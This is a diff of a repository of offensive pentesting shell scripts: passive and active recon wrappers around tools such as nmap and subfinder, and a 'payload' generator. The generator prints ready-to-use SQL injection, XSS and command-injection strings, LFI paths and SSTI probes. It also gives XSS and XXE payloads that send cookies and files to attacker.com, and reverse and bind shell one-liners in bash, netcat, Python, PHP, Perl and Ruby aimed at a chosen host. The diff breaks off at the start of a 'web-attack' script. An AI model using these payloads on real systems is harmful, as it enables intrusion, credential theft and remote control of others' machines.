    # Pane 3 (bottom-left): Wayback Machine / historical URLs
    tmux select-pane -t 3
    if command -v waybackurls &>/dev/null || command -v gau &>/dev/null; then
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Wayback Machine historical URLs...${NC}' && (waybackurls '$domain' 2>/dev/null || gau '$domain' 2>/dev/null || echo 'No wayback tool available') | tee wayback-urls.txt && cat wayback-urls.txt | unfurl -u paths 2>/dev/null | sort -u | tee wayback-paths.txt || true && echo -e '${GREEN}✓ Wayback complete${NC}'" C-m
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ waybackurls/gau not installed${NC}' && echo '# Install: go install github.com/tomnomnom/waybackurls@latest' && touch wayback-urls.txt" C-m
    fi

    # Pane 4 (bottom-right): Subdomain enumeration (passive only)
    tmux select-pane -t 4
    if command -v subfinder &>/dev/null || command -v amass &>/dev/null; then
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Passive subdomain enumeration...${NC}' && (subfinder -d '$domain' -silent 2>/dev/null || amass enum -passive -d '$domain' 2>/dev/null || echo 'No subdomain tool available') | tee subdomains-enum.txt && cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt && echo -e '${GREEN}✓ Subdomain enum complete${NC}'" C-m
    else
        tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ subfinder/amass not installed${NC}' && echo '# Install: go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest' && touch subdomains-enum.txt all-subdomains.txt" C-m
    fi

    # Focus back on DNS pane
    tmux select-pane -t 1

    echo
    echo -e "${GREEN}✓${NC} Tmux passive-recon window created"
    echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Passive: ${domain:0:15}... <--${NC}"
    echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
    echo
    echo -e "${MAGENTA}Note:${NC} 100% passive - no packets sent to target"
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
# Fallback used when $TMUX is unset: run DNS/WHOIS, cert transparency,
# wayback and subdomain enumeration inline, working inside OUTPUT_DIR
# and returning to the parent afterwards.
# Globals:   reads OUTPUT_DIR (set by setup_output_dir).
# Arguments: $1 - target domain
run_scans_sequential() {
    local domain="$1"

    # NOTE(review): the matching `cd ..` below assumes OUTPUT_DIR is a
    # single path component - true as produced by setup_output_dir.
    cd "$OUTPUT_DIR"

    echo -e "\n${GREENSTAR} Running DNS & WHOIS...${NC}"
    dig "$domain" ANY +noall +answer | tee dns.txt
    whois "$domain" | tee whois.txt

    echo -e "\n${GREENSTAR} Certificate Transparency...${NC}"
    # crt.sh returns JSON; wildcard entries (*.example.com) are flattened.
    curl -s "https://crt.sh/?q=%.$domain&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt

    echo -e "\n${GREENSTAR} Wayback Machine...${NC}"
    if command -v waybackurls &>/dev/null; then
        waybackurls "$domain" | tee wayback-urls.txt
    elif command -v gau &>/dev/null; then
        gau "$domain" | tee wayback-urls.txt
    fi

    echo -e "\n${GREENSTAR} Subdomain enumeration (passive)...${NC}"
    if command -v subfinder &>/dev/null; then
        subfinder -d "$domain" -silent | tee subdomains-enum.txt
    elif command -v amass &>/dev/null; then
        amass enum -passive -d "$domain" | tee subdomains-enum.txt
    fi

    # Merge the per-source subdomain lists into one deduplicated file.
    cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt

    cd ..

    echo -e "\n${GREEN}✓${NC} Passive recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Parse arguments
# Entry point: show help when asked (or with no args), validate the
# target, verify tooling, then kick off the recon run.
if (( $# == 0 )) || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

domain="$1"

# Validate domain (defensive: the zero-arg case is already handled above)
if [[ -z "$domain" ]]; then
    echo -e "${RED}Error:${NC} Domain required"
    echo "Usage: passive-recon <domain>"
    exit 1
fi

# Check tools
check_tools

# Run passive reconnaissance
run_passive_recon "$domain"
|
||||||
517
scripts/pentesting/payload
Executable file
517
scripts/pentesting/payload
Executable file
|
|
@ -0,0 +1,517 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: payload
# Description: Security payload generator with encoding and obfuscation
# Usage: payload list                      # List payload types
#        payload sql basic                 # Generate basic SQL injection payloads
#        payload xss reflected             # Generate reflected XSS payloads
#        payload cmd linux                 # Generate Linux command injection payloads
#        payload shell reverse 10.0.0.1    # Generate reverse shell payloads

VERSION="1.0.0"

# ANSI color escape constants used by every output helper below.
# NOTE: these hold the literal escape text; they are rendered via `echo -e`.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Print usage, payload types, examples and options to stdout.
# Globals (read): VERSION, BOLD, CYAN, NC
show_help() {
  echo -e "${BOLD}payload${NC} - Security Payload Generator v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo " payload <TYPE> <VARIANT> [OPTIONS]"
  echo
  echo -e "${BOLD}TYPES:${NC}"
  echo -e " ${CYAN}sql${NC} SQL injection payloads"
  echo -e " ${CYAN}xss${NC} Cross-site scripting payloads"
  echo -e " ${CYAN}cmd${NC} Command injection payloads"
  echo -e " ${CYAN}shell${NC} Reverse/bind shell payloads"
  echo -e " ${CYAN}lfi${NC} Local file inclusion payloads"
  echo -e " ${CYAN}xxe${NC} XML external entity payloads"
  echo -e " ${CYAN}ssti${NC} Server-side template injection"
  echo -e " ${CYAN}list${NC} List all available payloads"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo " payload list"
  echo " payload sql basic"
  echo " payload xss reflected"
  echo " payload cmd linux"
  echo " payload shell reverse 10.10.14.5 4444"
  echo " payload lfi linux"
  echo " payload xxe basic"
  echo
  # NOTE(review): -e/-o/-c are documented here but no option parsing is
  # visible in this file - confirm whether they are implemented elsewhere.
  echo -e "${BOLD}OPTIONS:${NC}"
  echo -e " ${CYAN}-e, --encode${NC} Encode payloads (base64, url, hex)"
  echo -e " ${CYAN}-o, --output${NC} Output to file"
  echo -e " ${CYAN}-c, --copy${NC} Copy to clipboard"
}
|
||||||
|
|
||||||
|
# Clipboard helper
|
||||||
|
# Pipe stdin into the first available clipboard tool
# (X11: xsel, xclip; macOS: pbcopy). Silently does nothing
# when no clipboard utility is installed.
clip_set() {
  local tool
  for tool in xsel xclip pbcopy; do
    if command -v "$tool" &>/dev/null; then
      case "$tool" in
        xsel)   xsel --input --clipboard ;;
        xclip)  xclip -selection clipboard ;;
        pbcopy) pbcopy ;;
      esac
      return
    fi
  done
}
|
||||||
|
|
||||||
|
# SQL Injection Payloads
|
||||||
|
# Emit SQL injection payload lists to stdout.
# Arguments: $1 - variant: basic (default) | auth-bypass | union
# Returns:   0 on success, 1 for an unknown variant.
generate_sql() {
  local kind="${1:-basic}"

  case "$kind" in
    basic)
      # General-purpose probes: boolean, union, error and time based.
      cat << 'EOF'
# Basic SQL Injection
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1--
') OR ('1'='1--

# Union-based
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

# Error-based
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS int)--

# Time-based blind
'; WAITFOR DELAY '0:0:5'--
'; SELECT SLEEP(5)--
' AND SLEEP(5)--
EOF
      ;;
    auth-bypass)
      # Login-form bypass strings.
      cat << 'EOF'
# Authentication Bypass
admin' OR '1'='1
admin' OR 1=1--
' OR 'a'='a
' OR 1=1 LIMIT 1--
admin'/*
' OR '1'='1'--
' OR '1'='1'#
' OR '1'='1'/*
') OR ('1'='1
admin') OR ('1'='1
admin') OR '1'='1'--
EOF
      ;;
    union)
      # Column-count discovery and data extraction via UNION.
      cat << 'EOF'
# UNION-based SQL Injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
-1' UNION SELECT NULL--
EOF
      ;;
    *)
      echo -e "${RED}Unknown SQL variant:${NC} $kind"
      echo "Available: basic, auth-bypass, union"
      return 1
      ;;
  esac
}
|
||||||
|
|
||||||
|
# XSS Payloads
|
||||||
|
# Emit cross-site scripting payload lists to stdout.
# Arguments: $1 - variant: basic/reflected (default) | stored | dom
# Returns:   0 on success, 1 for an unknown variant.
generate_xss() {
  local kind="${1:-basic}"

  case "$kind" in
    basic|reflected)
      # Reflected-context probes: tags, event handlers, attribute breakouts.
      cat << 'EOF'
# Basic XSS
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="alert(1)">
<audio src=x onerror=alert(1)>

# Event handlers
<div onmouseover=alert(1)>hover</div>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>

# Breaking out of attributes
"><script>alert(1)</script>
'><script>alert(1)</script>
" onclick=alert(1)//
' onclick=alert(1)//
EOF
      ;;
    stored)
      # Persistent payloads that exfiltrate cookies, plus filter bypasses.
      cat << 'EOF'
# Stored XSS (persistent)
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
<script>new Image().src='http://attacker.com/?c='+document.cookie</script>
<script>document.location='http://attacker.com/?c='+document.cookie</script>

# With common filters bypassed
<ScRiPt>alert(1)</sCrIpT>
<script>alert(String.fromCharCode(88,83,83))</script>
<iframe src="data:text/html,<script>alert(1)</script>">
EOF
      ;;
    dom)
      # DOM-sink payloads delivered via fragment/javascript: URLs.
      cat << 'EOF'
# DOM-based XSS
#<script>alert(1)</script>
#<img src=x onerror=alert(1)>
javascript:alert(1)
javascript:alert(document.domain)
javascript:alert(document.cookie)

# Hash-based
http://vulnerable.com/#<script>alert(1)</script>
http://vulnerable.com/#<img src=x onerror=alert(1)>
EOF
      ;;
    *)
      echo -e "${RED}Unknown XSS variant:${NC} $kind"
      echo "Available: basic, reflected, stored, dom"
      return 1
      ;;
  esac
}
|
||||||
|
|
||||||
|
# Command Injection Payloads
|
||||||
|
# Emit OS command injection payload lists to stdout.
# Arguments: $1 - variant: linux (default) | windows
# Returns:   0 on success, 1 for an unknown variant.
generate_cmd() {
  local kind="${1:-linux}"

  case "$kind" in
    linux)
      # Shell metacharacter separators, substitution forms, filter tricks.
      cat << 'EOF'
# Linux Command Injection
; whoami
| whoami
|| whoami
& whoami
&& whoami
; id
| id
`whoami`
$(whoami)
;ls -la
|ls -la
`ls -la`
$(ls -la)

# With common filters
;wh''oami
;who$()ami
;who\ami
`wh''oami`
$(wh''oami)

# Chaining
; cat /etc/passwd
| cat /etc/passwd
; cat /etc/shadow
EOF
      ;;
    windows)
      # cmd.exe / PowerShell separators and probe commands.
      cat << 'EOF'
# Windows Command Injection
& whoami
&& whoami
| whoami
|| whoami
; whoami
%0a whoami
` whoami `

# PowerShell
; powershell -c whoami
| powershell -c whoami
& powershell -c Get-Process

# CMD
& dir
&& dir c:\
| type c:\windows\win.ini
EOF
      ;;
    *)
      echo -e "${RED}Unknown command injection variant:${NC} $kind"
      echo "Available: linux, windows"
      return 1
      ;;
  esac
}
|
||||||
|
|
||||||
|
# Reverse Shell Payloads
|
||||||
|
# Emit reverse/bind shell one-liners with the attacker host/port filled in.
# Arguments: $1 - variant: reverse (default) | bind
#            $2 - listener host (default 10.10.14.5)
#            $3 - listener port (default 4444)
# Note: heredocs are deliberately UNQUOTED so $lhost/$lport expand;
#       payload-internal shell vars are written as \$ to survive expansion.
# Returns: 0 on success, 1 for an unknown variant.
generate_shell() {
  local kind="${1:-reverse}"
  local lhost="${2:-10.10.14.5}"
  local lport="${3:-4444}"

  case "$kind" in
    reverse)
      cat << EOF
# Bash Reverse Shells
bash -i >& /dev/tcp/$lhost/$lport 0>&1
bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'
0<&196;exec 196<>/dev/tcp/$lhost/$lport; sh <&196 >&196 2>&196

# Netcat Reverse Shells
nc -e /bin/sh $lhost $lport
nc -e /bin/bash $lhost $lport
nc -c bash $lhost $lport
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $lhost $lport >/tmp/f

# Python Reverse Shells
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP Reverse Shell
php -r '\$sock=fsockopen("$lhost",$lport);exec("/bin/sh -i <&3 >&3 2>&3");'

# Perl Reverse Shell
perl -e 'use Socket;\$i="$lhost";\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("$lhost",$lport).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
EOF
      ;;
    bind)
      cat << EOF
# Bind Shells (listen on target)
nc -lvnp $lport -e /bin/bash
nc -lvp $lport -e /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $lport >/tmp/f

# Python Bind Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",$lport));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);subprocess.call(["/bin/sh","-i"])'
EOF
      ;;
    *)
      echo -e "${RED}Unknown shell variant:${NC} $kind"
      echo "Available: reverse, bind"
      return 1
      ;;
  esac
}
|
||||||
|
|
||||||
|
# LFI Payloads
|
||||||
|
# Emit local-file-inclusion / path-traversal payload lists to stdout.
# Arguments: $1 - variant: linux (default) | windows
# Returns:   0 on success, 1 for an unknown variant.
generate_lfi() {
  local kind="${1:-linux}"

  case "$kind" in
    linux)
      # Traversal depths, sensitive files, log poisoning targets, PHP wrappers.
      cat << 'EOF'
# Basic LFI
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd

# Interesting Linux files
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/proc/self/environ
/proc/version
/proc/cmdline
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/auth.log
/var/log/syslog

# PHP wrappers
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
expect://whoami
data://text/plain,<?php system($_GET['cmd']);?>
EOF
      ;;
    windows)
      # Windows system files reachable via inclusion or traversal.
      cat << 'EOF'
# Windows LFI
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\system.ini
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\inetpub\wwwroot\web.config

# Path traversal
..\..\..\Windows\System32\drivers\etc\hosts
..\..\..\..\Windows\win.ini
EOF
      ;;
    *)
      echo -e "${RED}Unknown LFI variant:${NC} $kind"
      echo "Available: linux, windows"
      return 1
      ;;
  esac
}
|
||||||
|
|
||||||
|
# XXE Payloads
|
||||||
|
# Emit XML external entity (XXE) payload templates to stdout.
# Takes no arguments; always returns 0.
generate_xxe() {
  # Quoted heredoc: nothing inside is expanded by the shell.
  cat <<'EOF'
# Basic XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

# XXE with external DTD
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
<foo>&exfil;</foo>

# Blind XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;]>

# XXE OOB data exfiltration
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;]>
EOF
}
|
||||||
|
|
||||||
|
# SSTI Payloads
|
||||||
|
# Emit server-side template injection probes for common engines.
# Takes no arguments; always returns 0.
generate_ssti() {
  # Quoted heredoc: ${...} and $(...) in the payloads stay literal.
  cat <<'EOF'
# Jinja2 (Python/Flask)
{{7*7}}
{{config}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

# Twig (PHP)
{{7*7}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# Freemarker (Java)
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

# Thymeleaf (Java)
${7*7}
${T(java.lang.Runtime).getRuntime().exec('id')}

# Velocity (Java)
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))
EOF
}
|
||||||
|
|
||||||
|
# List all payloads
|
||||||
|
# Print the catalog of supported payload types and their variants.
# Globals (read): BOLD, CYAN, YELLOW, NC
list_payloads() {
  echo -e "${BOLD}${CYAN}Available Payload Types:${NC}"
  echo
  echo -e "${YELLOW}SQL Injection:${NC}"
  echo " payload sql basic - Basic SQL injection"
  echo " payload sql auth-bypass - Authentication bypass"
  echo " payload sql union - UNION-based injection"
  echo
  echo -e "${YELLOW}Cross-Site Scripting (XSS):${NC}"
  echo " payload xss basic - Basic XSS payloads"
  echo " payload xss reflected - Reflected XSS"
  echo " payload xss stored - Stored/persistent XSS"
  echo " payload xss dom - DOM-based XSS"
  echo
  echo -e "${YELLOW}Command Injection:${NC}"
  echo " payload cmd linux - Linux command injection"
  echo " payload cmd windows - Windows command injection"
  echo
  echo -e "${YELLOW}Reverse Shells:${NC}"
  echo " payload shell reverse IP PORT - Reverse shell payloads"
  echo " payload shell bind PORT - Bind shell payloads"
  echo
  echo -e "${YELLOW}File Inclusion:${NC}"
  echo " payload lfi linux - Linux LFI/path traversal"
  echo " payload lfi windows - Windows LFI/path traversal"
  echo
  echo -e "${YELLOW}Other:${NC}"
  echo " payload xxe - XML external entity"
  echo " payload ssti - Server-side template injection"
}
|
||||||
|
|
||||||
|
# ---- Entry point -------------------------------------------------------
# Help when invoked bare or with a help flag.
if [[ $# -eq 0 || "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

type="$1"
shift

# Dispatch to the matching generator; remaining args select the variant.
case "$type" in
  list|ls)       list_payloads ;;
  sql)           generate_sql "$@" ;;
  xss)           generate_xss "$@" ;;
  cmd|command)   generate_cmd "$@" ;;
  shell|shells)  generate_shell "$@" ;;
  lfi)           generate_lfi "$@" ;;
  xxe)           generate_xxe ;;
  ssti|template) generate_ssti ;;
  *)
    echo -e "${RED}Error:${NC} Unknown payload type: $type"
    echo "Run 'payload list' to see available types"
    exit 1
    ;;
esac
|
||||||
196
scripts/pentesting/recon
Executable file
196
scripts/pentesting/recon
Executable file
|
|
@ -0,0 +1,196 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: recon.sh
# Description: Network/host reconnaissance with tmux orchestration
# Usage: recon <target>
# Creates tmux window with parallel nmap scans and enum4linux

VERSION="2.0.0"

# ANSI color escape constants (literal escape text, rendered via `echo -e`).
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Pre-colored status prefixes used in log lines ([+] ok, [*] progress,
# [-] / [!] failures).
readonly GREENPLUS="${GREEN}[+]${NC}"
readonly GREENSTAR="${YELLOW}[*]${NC}"
readonly REDMINUS="${RED}[-]${NC}"
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
# Print usage, pane layout description and examples to stdout.
# Globals (read): VERSION, BOLD, NC
show_help() {
  echo -e "${BOLD}recon${NC} - Network Reconnaissance Script v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo " recon <target>"
  echo
  echo -e "${BOLD}DESCRIPTION:${NC}"
  echo " Creates tmux window with 3 panes running parallel reconnaissance:"
  echo " - Pane 1: nmap service scan + version detection"
  echo " - Pane 2: nmap vulnerability scan + full port scan"
  echo " - Pane 3: enum4linux-ng (SMB enumeration)"
  echo
  echo -e "${BOLD}EXAMPLE:${NC}"
  echo " recon 10.10.10.5"
  echo " recon target.htb"
  echo
  echo -e "${BOLD}OUTPUT:${NC}"
  echo " All results saved to: ./recon-<target>-<timestamp>/"
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
# Verify required tooling is present; warn about useful optional tools.
# Globals (read): YELLOW, RED, NC
# Exits 1 when a hard requirement (nmap, tmux) is missing.
check_tools() {
  local missing=()
  local tool

  # Hard requirements: the scans need nmap, the layout needs tmux.
  for tool in nmap tmux; do
    command -v "$tool" &>/dev/null || missing+=("$tool")
  done

  # Optional helpers - absence only degrades functionality.
  if ! command -v naabu &>/dev/null; then
    echo -e "${YELLOW}⚠${NC} naabu not found (optional - using pure nmap)"
  fi

  if ! command -v docker &>/dev/null; then
    echo -e "${YELLOW}⚠${NC} docker not found (skipping enum4linux-ng)"
  fi

  if (( ${#missing[@]} > 0 )); then
    echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
    echo "Install with: sudo apt install ${missing[*]}"
    exit 1
  fi
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
# Create a timestamped results directory for this target and export
# its name via the OUTPUT_DIR global.
# Globals (written): OUTPUT_DIR
# Arguments: $1 - scan target (host/IP/CIDR; '/' and ':' are sanitized)
setup_output_dir() {
  local target="$1"
  local timestamp clean_target

  # Declaration split from assignment so a failing command substitution
  # is not masked by `local` and is caught under `set -e`.
  timestamp=$(date +%Y%m%d-%H%M%S)
  clean_target=$(echo "$target" | tr '/:' '_')

  OUTPUT_DIR="recon-${clean_target}-${timestamp}"
  mkdir -p "$OUTPUT_DIR"

  echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Main recon function
|
||||||
|
# Orchestrate reconnaissance against a single target.
# Inside tmux: builds a 3-pane window running scans in parallel.
# Outside tmux: falls back to run_scans_sequential.
# Globals: OUTPUT_DIR (set by setup_output_dir), color constants.
# Arguments: $1 - target host/IP
run_recon() {
  local target="$1"

  # Banner
  echo -e "${CYAN}${BOLD}"
  echo "╔════════════════════════════════════════════════════════════╗"
  echo "║ Network Reconnaissance ║"
  echo "║ Target: $target"
  echo "╚════════════════════════════════════════════════════════════╝"
  echo -e "${NC}"

  # Create output directory
  setup_output_dir "$target"

  # Check if in tmux; if not, run everything in the current terminal.
  if [[ -z "${TMUX:-}" ]]; then
    echo -e "${YELLOW}⚠${NC} Not in tmux session - results will be in terminal"
    run_scans_sequential "$target"
    return
  fi

  # Create tmux window
  tmux new-window -n "<<Recon: $target>>"

  # Split into 3 panes.
  # NOTE(review): pane indices shift after each split; the -t numbers
  # below assume tmux's default base-index 0 - confirm with a custom
  # base-index/pane-base-index configuration.
  # Bottom pane (pane 0)
  tmux split-window -v

  # Top left pane (pane 1)
  tmux select-pane -t 0
  tmux split-window -h

  # Top right pane (pane 2)
  tmux select-pane -t 1
  tmux split-window -h

  # Pane 0 (bottom): Quick scan + detailed scan.
  # The whole command line is sent as keystrokes; color vars expand here,
  # $PWD/$OUTPUT_DIR is resolved before sending.
  tmux select-pane -t 0
  if command -v naabu &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting quick port discovery with naabu...${NC}' && naabu -host $target -nmap-cli 'nmap -A -T4 -oA nmap_quick' && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && naabu -host $target -nmap-cli 'nmap -sV -sC -Pn -oN nmap_detailed'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nmap scan...${NC}' && nmap -sV -sC -T4 -oA nmap_quick $target && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && nmap -sV -sC -Pn -oN nmap_detailed $target" C-m
  fi

  # Pane 1 (top left): Vulnerability scan + full port scan
  tmux select-pane -t 1
  if command -v naabu &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && naabu -host $target -nmap-cli 'nmap --script vuln -Pn -oN nmap_vuln' && echo -e '\n${GREENSTAR} Starting full port scan (all 65535)...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && nmap --script vuln -Pn -oN nmap_vuln $target && echo -e '\n${GREENSTAR} Starting full port scan...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
  fi

  # Pane 2 (top right): enum4linux-ng via docker (skipped without docker).
  # NOTE(review): 'docker run ... enum4linux-ng' assumes a local image with
  # that tag exists - confirm image name/registry.
  tmux select-pane -t 2
  if command -v docker &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting enum4linux-ng (SMB enumeration)...${NC}' && docker run --rm -t enum4linux-ng -A -C $target -oY enum4linux-ng.yaml | tee enum4linux-ng.txt" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ Docker not available - skipping enum4linux-ng${NC}' && echo 'Install docker to enable SMB enumeration' && sleep 5" C-m
  fi

  # Focus back on bottom pane
  tmux select-pane -t 0

  echo
  echo -e "${GREEN}✓${NC} Tmux recon window created"
  echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}<<Recon: $target>>${NC}"
  echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
# Fallback when not running inside tmux: execute each scan one after
# another in the current terminal. Results land in $OUTPUT_DIR.
# Globals: OUTPUT_DIR (read), color/status constants.
# Arguments: $1 - target host/IP
run_scans_sequential() {
  local host="$1"

  cd "$OUTPUT_DIR"

  echo -e "\n${GREENSTAR} Running nmap service scan...${NC}"
  if command -v naabu &>/dev/null; then
    # naabu discovers open ports first, then hands them to nmap
    naabu -host "$host" -nmap-cli 'nmap -sV -sC -T4 -oA nmap_quick'
  else
    nmap -sV -sC -T4 -oA nmap_quick "$host"
  fi

  echo -e "\n${GREENSTAR} Running vulnerability scan...${NC}"
  nmap --script vuln -Pn -oN nmap_vuln "$host"

  if command -v docker &>/dev/null; then
    echo -e "\n${GREENSTAR} Running enum4linux-ng...${NC}"
    docker run --rm -t enum4linux-ng -A -C "$host" -oY enum4linux-ng.yaml | tee enum4linux-ng.txt
  fi

  cd ..

  echo -e "\n${GREEN}✓${NC} Recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# ---- Entry point -------------------------------------------------------
# Show usage when invoked without arguments or with a help flag.
if [[ $# -eq 0 || "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

target="$1"

# Defensive re-check: reject an explicit empty-string argument.
if [[ -z "$target" ]]; then
  echo -e "${RED}Error:${NC} Target required"
  echo "Usage: recon <target>"
  exit 1
fi

# Verify required tooling, then run the scans.
check_tools
run_recon "$target"
|
||||||
460
scripts/pentesting/web-attack
Executable file
460
scripts/pentesting/web-attack
Executable file
|
|
@ -0,0 +1,460 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: web-attack
# Description: Web application OWASP Top 10 exploitation testing
# Usage: web-attack <url>

VERSION="1.0.0"

# ANSI color escape constants (literal escape text, rendered via `echo -e`).
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Pre-colored status prefixes used in log lines ([+] ok, [*] progress,
# [-] / [!] failures).
